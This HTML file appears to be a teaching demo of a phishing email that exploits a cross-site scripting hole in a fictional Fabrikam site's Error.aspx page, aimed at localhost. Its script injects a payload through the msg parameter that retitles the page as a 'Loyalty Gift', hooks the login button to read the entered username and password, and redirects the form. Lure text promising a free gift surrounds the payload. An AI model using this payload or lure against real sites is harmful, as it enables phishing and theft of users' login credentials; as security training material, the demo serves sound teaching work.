<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<!-- sample phishing email that takes advantage of
     an XSS vulnerability in Fabrikam's error.aspx page -->

<head>
    <title>Fabrikam Loyalty Reward</title>
    <base href="http://localhost/CrossSiteScripting/" />
    <link href="art/StyleSheet.css" rel="stylesheet" type="text/css" />
</head>
<body>
    <div>
        &nbsp;<div>
            &nbsp;</div>

        <table>
            <tr>
                <td style="width: 100px; height: 65px" valign="top">
                    <a href='javascript:jumpToFabrikamGift()'><img border="0" alt="Fabrikam" src="art/fabrikam.gif" id="imgFabrikam" /></a></td>
                <td align="center" class="PageTitle" style="width: 299px; height: 65px" valign="middle">
                    <b><span id="ctl00_lblPageTitle">Loyalty Reward</span></b></td>
                <td align="center" class="LoginArea" style="width: 299px; height: 65px"></td>
            </tr>
        </table>
        <br />
        <br />
        <table style="width: 100%">
            <tr>

                <td style="width: 20px;">
                </td>
                <td style="width: 771px;">
                    <h3 class="FormTitle"><span id="ctl00_lblFormTitle">Thanks for being a loyal customer!</span></h3>
                    <table border="5" class="BorderTable">
                    <tr><td>
                    <table cellpadding="1"><tr><td>
                        <p>At Fabrikam, we take pride in the loyalty that our customers have shown over the years,
                        and this year we'd like to <a href='javascript:jumpToFabrikamGift()'>give a little back</a>.</p>
                        <p>So click <a href='javascript:jumpToFabrikamGift()'>here</a> to register for a free gift. You'll be glad you did!</p>
                    </td></tr></table>    
                    </td></tr>
                    </table>
                </td>
            </tr>
        </table>
    </div>
    

<script type="text/javascript">
function jumpToFabrikamGift() {
  var html = "Please log in. You will be automatically registered for a free gift!" +
               "<script>" +
                 "var u, p;" +
                 "function myLogon() {" +
                   "u = document.getElementById('ctl00$LoginView1$Login1$UserName').value;" +
                   "p = document.getElementById('ctl00$LoginView1$Login1$Password').value;" +
                 "}" +
                 "function thanks() { " +
                   "var msg = 'Your gift will be shipped within 7 business days. Thanks again for your loyalty! " +
                              "Oh and by the way, I learned something about you today. " +
                              "Your user name is: ' %2B u %2B ' and your password is: ' %2B p;" +
                   "document.getElementById('ctl00_MainBody_message').innerText=msg;" +
                 "}" +
                 "document.getElementById('ctl00_lblFormTitle').lastChild.nodeValue='Loyalty Gift';" +
                 "document.getElementById('ctl00_lblPageTitle').lastChild.nodeValue='Loyalty Gift';" +
                 "document.getElementById('ctl00$LoginView1$Login1$LoginButton').onclick = myLogon;" +
                 "document.forms[0].action = 'javascript:thanks()';" +
               "<\/script>";
  location = 'http://localhost/CrossSiteScripting/Error.aspx?msg=' + html;
}
</script>
</body>
</html>


